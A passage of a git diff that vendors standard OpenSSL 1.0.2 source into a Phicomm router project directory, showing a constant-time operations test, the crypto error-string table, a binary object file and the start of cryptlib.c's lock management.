+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "../crypto/constant_time_locl.h"
+
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+static const unsigned int CONSTTIME_TRUE = (unsigned)(~0);
+static const unsigned int CONSTTIME_FALSE = 0;
+static const unsigned char CONSTTIME_TRUE_8 = 0xff;
+static const unsigned char CONSTTIME_FALSE_8 = 0;
+
+static int test_binary_op(unsigned int (*op) (unsigned int a, unsigned int b),
+                          const char *op_name, unsigned int a, unsigned int b,
+                          int is_true)
+{
+    unsigned c = op(a, b);
+    if (is_true && c != CONSTTIME_TRUE) {
+        fprintf(stderr, "Test failed for %s(%du, %du): expected %du "
+                "(TRUE), got %du\n", op_name, a, b, CONSTTIME_TRUE, c);
+        return 1;
+    } else if (!is_true && c != CONSTTIME_FALSE) {
+        fprintf(stderr, "Test failed for  %s(%du, %du): expected %du "
+                "(FALSE), got %du\n", op_name, a, b, CONSTTIME_FALSE, c);
+        return 1;
+    }
+    return 0;
+}
+
+static int test_binary_op_8(unsigned
+                            char (*op) (unsigned int a, unsigned int b),
+                            const char *op_name, unsigned int a,
+                            unsigned int b, int is_true)
+{
+    unsigned char c = op(a, b);
+    if (is_true && c != CONSTTIME_TRUE_8) {
+        fprintf(stderr, "Test failed for %s(%du, %du): expected %u "
+                "(TRUE), got %u\n", op_name, a, b, CONSTTIME_TRUE_8, c);
+        return 1;
+    } else if (!is_true && c != CONSTTIME_FALSE_8) {
+        fprintf(stderr, "Test failed for  %s(%du, %du): expected %u "
+                "(FALSE), got %u\n", op_name, a, b, CONSTTIME_FALSE_8, c);
+        return 1;
+    }
+    return 0;
+}
+
+static int test_is_zero(unsigned int a)
+{
+    unsigned int c = constant_time_is_zero(a);
+    if (a == 0 && c != CONSTTIME_TRUE) {
+        fprintf(stderr, "Test failed for constant_time_is_zero(%du): "
+                "expected %du (TRUE), got %du\n", a, CONSTTIME_TRUE, c);
+        return 1;
+    } else if (a != 0 && c != CONSTTIME_FALSE) {
+        fprintf(stderr, "Test failed for constant_time_is_zero(%du): "
+                "expected %du (FALSE), got %du\n", a, CONSTTIME_FALSE, c);
+        return 1;
+    }
+    return 0;
+}
+
+static int test_is_zero_8(unsigned int a)
+{
+    unsigned char c = constant_time_is_zero_8(a);
+    if (a == 0 && c != CONSTTIME_TRUE_8) {
+        fprintf(stderr, "Test failed for constant_time_is_zero(%du): "
+                "expected %u (TRUE), got %u\n", a, CONSTTIME_TRUE_8, c);
+        return 1;
+    } else if (a != 0 && c != CONSTTIME_FALSE) {
+        fprintf(stderr, "Test failed for constant_time_is_zero(%du): "
+                "expected %u (FALSE), got %u\n", a, CONSTTIME_FALSE_8, c);
+        return 1;
+    }
+    return 0;
+}
+
+static int test_select(unsigned int a, unsigned int b)
+{
+    unsigned int selected = constant_time_select(CONSTTIME_TRUE, a, b);
+    if (selected != a) {
+        fprintf(stderr, "Test failed for constant_time_select(%du, %du,"
+                "%du): expected %du(first value), got %du\n",
+                CONSTTIME_TRUE, a, b, a, selected);
+        return 1;
+    }
+    selected = constant_time_select(CONSTTIME_FALSE, a, b);
+    if (selected != b) {
+        fprintf(stderr, "Test failed for constant_time_select(%du, %du,"
+                "%du): expected %du(second value), got %du\n",
+                CONSTTIME_FALSE, a, b, b, selected);
+        return 1;
+    }
+    return 0;
+}
+
+static int test_select_8(unsigned char a, unsigned char b)
+{
+    unsigned char selected = constant_time_select_8(CONSTTIME_TRUE_8, a, b);
+    if (selected != a) {
+        fprintf(stderr, "Test failed for constant_time_select(%u, %u,"
+                "%u): expected %u(first value), got %u\n",
+                CONSTTIME_TRUE, a, b, a, selected);
+        return 1;
+    }
+    selected = constant_time_select_8(CONSTTIME_FALSE_8, a, b);
+    if (selected != b) {
+        fprintf(stderr, "Test failed for constant_time_select(%u, %u,"
+                "%u): expected %u(second value), got %u\n",
+                CONSTTIME_FALSE, a, b, b, selected);
+        return 1;
+    }
+    return 0;
+}
+
+static int test_select_int(int a, int b)
+{
+    int selected = constant_time_select_int(CONSTTIME_TRUE, a, b);
+    if (selected != a) {
+        fprintf(stderr, "Test failed for constant_time_select(%du, %d,"
+                "%d): expected %d(first value), got %d\n",
+                CONSTTIME_TRUE, a, b, a, selected);
+        return 1;
+    }
+    selected = constant_time_select_int(CONSTTIME_FALSE, a, b);
+    if (selected != b) {
+        fprintf(stderr, "Test failed for constant_time_select(%du, %d,"
+                "%d): expected %d(second value), got %d\n",
+                CONSTTIME_FALSE, a, b, b, selected);
+        return 1;
+    }
+    return 0;
+}
+
+static int test_eq_int(int a, int b)
+{
+    unsigned int equal = constant_time_eq_int(a, b);
+    if (a == b && equal != CONSTTIME_TRUE) {
+        fprintf(stderr, "Test failed for constant_time_eq_int(%d, %d): "
+                "expected %du(TRUE), got %du\n", a, b, CONSTTIME_TRUE, equal);
+        return 1;
+    } else if (a != b && equal != CONSTTIME_FALSE) {
+        fprintf(stderr, "Test failed for constant_time_eq_int(%d, %d): "
+                "expected %du(FALSE), got %du\n",
+                a, b, CONSTTIME_FALSE, equal);
+        return 1;
+    }
+    return 0;
+}
+
+static int test_eq_int_8(int a, int b)
+{
+    unsigned char equal = constant_time_eq_int_8(a, b);
+    if (a == b && equal != CONSTTIME_TRUE_8) {
+        fprintf(stderr, "Test failed for constant_time_eq_int_8(%d, %d): "
+                "expected %u(TRUE), got %u\n", a, b, CONSTTIME_TRUE_8, equal);
+        return 1;
+    } else if (a != b && equal != CONSTTIME_FALSE_8) {
+        fprintf(stderr, "Test failed for constant_time_eq_int_8(%d, %d): "
+                "expected %u(FALSE), got %u\n",
+                a, b, CONSTTIME_FALSE_8, equal);
+        return 1;
+    }
+    return 0;
+}
+
+static unsigned int test_values[] =
+    { 0, 1, 1024, 12345, 32000, UINT_MAX / 2 - 1,
+    UINT_MAX / 2, UINT_MAX / 2 + 1, UINT_MAX - 1,
+    UINT_MAX
+};
+
+static unsigned char test_values_8[] =
+    { 0, 1, 2, 20, 32, 127, 128, 129, 255 };
+
+static int signed_test_values[] = { 0, 1, -1, 1024, -1024, 12345, -12345,
+    32000, -32000, INT_MAX, INT_MIN, INT_MAX - 1,
+    INT_MIN + 1
+};
+
+int main(int argc, char *argv[])
+{
+    unsigned int a, b, i, j;
+    int c, d;
+    unsigned char e, f;
+    int num_failed = 0, num_all = 0;
+    fprintf(stdout, "Testing constant time operations...\n");
+
+    for (i = 0; i < sizeof(test_values) / sizeof(int); ++i) {
+        a = test_values[i];
+        num_failed += test_is_zero(a);
+        num_failed += test_is_zero_8(a);
+        num_all += 2;
+        for (j = 0; j < sizeof(test_values) / sizeof(int); ++j) {
+            b = test_values[j];
+            num_failed += test_binary_op(&constant_time_lt,
+                                         "constant_time_lt", a, b, a < b);
+            num_failed += test_binary_op_8(&constant_time_lt_8,
+                                           "constant_time_lt_8", a, b, a < b);
+            num_failed += test_binary_op(&constant_time_lt,
+                                         "constant_time_lt_8", b, a, b < a);
+            num_failed += test_binary_op_8(&constant_time_lt_8,
+                                           "constant_time_lt_8", b, a, b < a);
+            num_failed += test_binary_op(&constant_time_ge,
+                                         "constant_time_ge", a, b, a >= b);
+            num_failed += test_binary_op_8(&constant_time_ge_8,
+                                           "constant_time_ge_8", a, b,
+                                           a >= b);
+            num_failed +=
+                test_binary_op(&constant_time_ge, "constant_time_ge", b, a,
+                               b >= a);
+            num_failed +=
+                test_binary_op_8(&constant_time_ge_8, "constant_time_ge_8", b,
+                                 a, b >= a);
+            num_failed +=
+                test_binary_op(&constant_time_eq, "constant_time_eq", a, b,
+                               a == b);
+            num_failed +=
+                test_binary_op_8(&constant_time_eq_8, "constant_time_eq_8", a,
+                                 b, a == b);
+            num_failed +=
+                test_binary_op(&constant_time_eq, "constant_time_eq", b, a,
+                               b == a);
+            num_failed +=
+                test_binary_op_8(&constant_time_eq_8, "constant_time_eq_8", b,
+                                 a, b == a);
+            num_failed += test_select(a, b);
+            num_all += 13;
+        }
+    }
+
+    for (i = 0; i < sizeof(signed_test_values) / sizeof(int); ++i) {
+        c = signed_test_values[i];
+        for (j = 0; j < sizeof(signed_test_values) / sizeof(int); ++j) {
+            d = signed_test_values[j];
+            num_failed += test_select_int(c, d);
+            num_failed += test_eq_int(c, d);
+            num_failed += test_eq_int_8(c, d);
+            num_all += 3;
+        }
+    }
+
+    for (i = 0; i < sizeof(test_values_8); ++i) {
+        e = test_values_8[i];
+        for (j = 0; j < sizeof(test_values_8); ++j) {
+            f = test_values_8[j];
+            num_failed += test_select_8(e, f);
+            num_all += 1;
+        }
+    }
+
+    if (!num_failed) {
+        fprintf(stdout, "ok (ran %d tests)\n", num_all);
+        return EXIT_SUCCESS;
+    } else {
+        fprintf(stdout, "%d of %d tests failed!\n", num_failed, num_all);
+        return EXIT_FAILURE;
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cpt_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cpt_err.c
new file mode 100644
index 0000000..a513838
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cpt_err.c
@@ -0,0 +1,104 @@
+/* crypto/cpt_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/crypto.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_CRYPTO,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_CRYPTO,0,reason)
+
+static ERR_STRING_DATA CRYPTO_str_functs[] = {
+    {ERR_FUNC(CRYPTO_F_CRYPTO_GET_EX_NEW_INDEX), "CRYPTO_get_ex_new_index"},
+    {ERR_FUNC(CRYPTO_F_CRYPTO_GET_NEW_DYNLOCKID), "CRYPTO_get_new_dynlockid"},
+    {ERR_FUNC(CRYPTO_F_CRYPTO_GET_NEW_LOCKID), "CRYPTO_get_new_lockid"},
+    {ERR_FUNC(CRYPTO_F_CRYPTO_SET_EX_DATA), "CRYPTO_set_ex_data"},
+    {ERR_FUNC(CRYPTO_F_DEF_ADD_INDEX), "DEF_ADD_INDEX"},
+    {ERR_FUNC(CRYPTO_F_DEF_GET_CLASS), "DEF_GET_CLASS"},
+    {ERR_FUNC(CRYPTO_F_FIPS_MODE_SET), "FIPS_mode_set"},
+    {ERR_FUNC(CRYPTO_F_INT_DUP_EX_DATA), "INT_DUP_EX_DATA"},
+    {ERR_FUNC(CRYPTO_F_INT_FREE_EX_DATA), "INT_FREE_EX_DATA"},
+    {ERR_FUNC(CRYPTO_F_INT_NEW_EX_DATA), "INT_NEW_EX_DATA"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA CRYPTO_str_reasons[] = {
+    {ERR_REASON(CRYPTO_R_FIPS_MODE_NOT_SUPPORTED), "fips mode not supported"},
+    {ERR_REASON(CRYPTO_R_NO_DYNLOCK_CREATE_CALLBACK),
+     "no dynlock create callback"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_CRYPTO_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(CRYPTO_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, CRYPTO_str_functs);
+        ERR_load_strings(0, CRYPTO_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cpt_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cpt_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..15ad566784f3e1162b219bfd723f3a4037c769ef
GIT binary patch
literal 1368
zcmbtS%}T>S5T2N7)e8RLL8wT@gNnMe{vdjgLaDuoN>R{*gtW$1Y}1l#p?c6)=%e@u
z1z*C)sCe_DGtF+gT`PhPOlIcGeDkxrPuZixA;SPE1{^>yk|@B%P|r_y-84)<4BjUf
zK3*V~$?PXq&I=8fHxhenizPQwyNzy`dfZI1<o0R+Lj<`~sKcna<8#2WZNf}clG(t3
z@sJ0jIc3BrqN6Pwi12ywkGQ`H?GS;t&p~<Szzt~zWl4o-hSMn^x@LEaevBd$M!thx
zJo*DpC(ti33}=)%!<~zDZaJREijd9ctxC<lwlew4)3X!H=iaSb@`E}FQI0n1+lu-3
zRc;r6VR~T8(&J8(1G~1l4Xoh%z>2kM)o~GXYusUYT^l~Pi+3U}xeZqLYIVos_rN@-
zVl$^~-FSA@5zYT$;>e{t)K4-kYKG?_V*Sl7B2JimS0W9v($TEWU&jBVsDI_JBbRC>
zQB{%s*HjRF*<acn1yfV&YM}U%Cn4%XudVOyF_!!U`l`^bs$5|}HFbVVB<XwU{0q#Z
zSDhC5(!7d6=L9f@mgbavi4W>cls0`(I)Q<4v{Xaq6Q<uCQJzKrB?=S~aEMH!H;CU6
LiKQ?zaCH6`v8_<d

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cryptlib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cryptlib.c
new file mode 100644
index 0000000..98526d7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cryptlib.c
@@ -0,0 +1,1016 @@
+/* crypto/cryptlib.c */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECDH support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#include "cryptlib.h"
+#include <openssl/safestack.h>
+
+#if defined(OPENSSL_SYS_WIN32) || defined(OPENSSL_SYS_WIN16)
+static double SSLeay_MSVC5_hack = 0.0; /* and for VC1.5 */
+#endif
+
+DECLARE_STACK_OF(CRYPTO_dynlock)
+
+/* real #defines in crypto.h, keep these upto date */
+static const char *const lock_names[CRYPTO_NUM_LOCKS] = {
+    "<<ERROR>>",
+    "err",
+    "ex_data",
+    "x509",
+    "x509_info",
+    "x509_pkey",
+    "x509_crl",
+    "x509_req",
+    "dsa",
+    "rsa",
+    "evp_pkey",
+    "x509_store",
+    "ssl_ctx",
+    "ssl_cert",
+    "ssl_session",
+    "ssl_sess_cert",
+    "ssl",
+    "ssl_method",
+    "rand",
+    "rand2",
+    "debug_malloc",
+    "BIO",
+    "gethostbyname",
+    "getservbyname",
+    "readdir",
+    "RSA_blinding",
+    "dh",
+    "debug_malloc2",
+    "dso",
+    "dynlock",
+    "engine",
+    "ui",
+    "ecdsa",
+    "ec",
+    "ecdh",
+    "bn",
+    "ec_pre_comp",
+    "store",
+    "comp",
+    "fips",
+    "fips2",
+#if CRYPTO_NUM_LOCKS != 41
+# error "Inconsistency between crypto.h and cryptlib.c"
+#endif
+};
+
+/*
+ * This is for applications to allocate new type names in the non-dynamic
+ * array of lock names.  These are numbered with positive numbers.
+ */
+static STACK_OF(OPENSSL_STRING) *app_locks = NULL;
+
+/*
+ * For applications that want a more dynamic way of handling threads, the
+ * following stack is used.  These are externally numbered with negative
+ * numbers.
+ */
+static STACK_OF(CRYPTO_dynlock) *dyn_locks = NULL;
+
+static void (MS_FAR *locking_callback) (int mode, int type,
+                                        const char *file, int line) = 0;
+static int (MS_FAR *add_lock_callback) (int *pointer, int amount,
+                                        int type, const char *file,
+                                        int line) = 0;
+#ifndef OPENSSL_NO_DEPRECATED
+static unsigned long (MS_FAR *id_callback) (void) = 0;
+#endif
+static void (MS_FAR *threadid_callback) (CRYPTO_THREADID *) = 0;
+static struct CRYPTO_dynlock_value *(MS_FAR *dynlock_create_callback)
+ (const char *file, int line) = 0;
+static void (MS_FAR *dynlock_lock_callback) (int mode,
+                                             struct CRYPTO_dynlock_value *l,
+                                             const char *file, int line) = 0;
+static void (MS_FAR *dynlock_destroy_callback) (struct CRYPTO_dynlock_value
+                                                *l, const char *file,
+                                                int line) = 0;
+
+int CRYPTO_get_new_lockid(char *name)
+{
+    char *str;
+    int i;
+
+#if defined(OPENSSL_SYS_WIN32) || defined(OPENSSL_SYS_WIN16)
+    /*
+     * A hack to make Visual C++ 5.0 work correctly when linking as a DLL
+     * using /MT. Without this, the application cannot use any floating point
+     * printf's. It also seems to be needed for Visual C 1.5 (win16)
+     */
+    SSLeay_MSVC5_hack = (double)name[0] * (double)name[1];
+#endif
+
+    if ((app_locks == NULL)
+        && ((app_locks = sk_OPENSSL_STRING_new_null()) == NULL)) {
+        CRYPTOerr(CRYPTO_F_CRYPTO_GET_NEW_LOCKID, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    if ((str = BUF_strdup(name)) == NULL) {
+        CRYPTOerr(CRYPTO_F_CRYPTO_GET_NEW_LOCKID, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    i = sk_OPENSSL_STRING_push(app_locks, str);
+    if (!i)
+        OPENSSL_free(str);
+    else
+        i += CRYPTO_NUM_LOCKS;  /* gap of one :-) */
+    return (i);
+}
+
+int CRYPTO_num_locks(void)
+{
+    return CRYPTO_NUM_LOCKS;
+}
+
+int CRYPTO_get_new_dynlockid(void)
+{
+    int i = 0;
+    CRYPTO_dynlock *pointer = NULL;
+
+    if (dynlock_create_callback == NULL) {
+        CRYPTOerr(CRYPTO_F_CRYPTO_GET_NEW_DYNLOCKID,
+                  CRYPTO_R_NO_DYNLOCK_CREATE_CALLBACK);
+        return (0);
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_DYNLOCK);
+    if ((dyn_locks == NULL)
+        && ((dyn_locks = sk_CRYPTO_dynlock_new_null()) == NULL)) {
+        CRYPTO_w_unlock(CRYPTO_LOCK_DYNLOCK);
+        CRYPTOerr(CRYPTO_F_CRYPTO_GET_NEW_DYNLOCKID, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_DYNLOCK);
+
+    pointer = (CRYPTO_dynlock *) OPENSSL_malloc(sizeof(CRYPTO_dynlock));
+    if (pointer == NULL) {
+        CRYPTOerr(CRYPTO_F_CRYPTO_GET_NEW_DYNLOCKID, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    pointer->references = 1;
+    pointer->data = dynlock_create_callback(__FILE__, __LINE__);
+    if (pointer->data == NULL) {
+        OPENSSL_free(pointer);
+        CRYPTOerr(CRYPTO_F_CRYPTO_GET_NEW_DYNLOCKID, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+
+    CRYPTO_w_lock(CRYPTO_LOCK_DYNLOCK);
+    /* First, try to find an existing empty slot */
+    i = sk_CRYPTO_dynlock_find(dyn_locks, NULL);
+    /* If there was none, push, thereby creating a new one */
+    if (i == -1)
+        /*
+         * Since sk_push() returns the number of items on the stack, not the
+         * location of the pushed item, we need to transform the returned
+         * number into a position, by decreasing it.
+         */
+        i = sk_CRYPTO_dynlock_push(dyn_locks, pointer) - 1;
+    else
+        /*
+         * If we found a place with a NULL pointer, put our pointer in it.
+         */
+        (void)sk_CRYPTO_dynlock_set(dyn_locks, i, pointer);
+    CRYPTO_w_unlock(CRYPTO_LOCK_DYNLOCK);
+
+    if (i == -1) {
+        dynlock_destroy_callback(pointer->data, __FILE__, __LINE__);
+        OPENSSL_free(pointer);
+    } else
+        i += 1;                 /* to avoid 0 */
+    return -i;
+}
+
+void CRYPTO_destroy_dynlockid(int i)
+{
+    CRYPTO_dynlock *pointer = NULL;
+    if (i)
+        i = -i - 1;
+    if (dynlock_destroy_callback == NULL)
+        return;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_DYNLOCK);
+
+    if (dyn_locks == NULL || i >= sk_CRYPTO_dynlock_num(dyn_locks)) {
+        CRYPTO_w_unlock(CRYPTO_LOCK_DYNLOCK);
+        return;
+    }
+    pointer = sk_CRYPTO_dynlock_value(dyn_locks, i);
+    if (pointer != NULL) {
+        --pointer->references;
+#ifdef REF_CHECK
+        if (pointer->references < 0) {
+            fprintf(stderr,
+                    "CRYPTO_destroy_dynlockid, bad reference count\n");
+            abort();
+        } else
+#endif
+        if (pointer->references <= 0) {
+            (void)sk_CRYPTO_dynlock_set(dyn_locks, i, NULL);
+        } else
+            pointer = NULL;
+    }
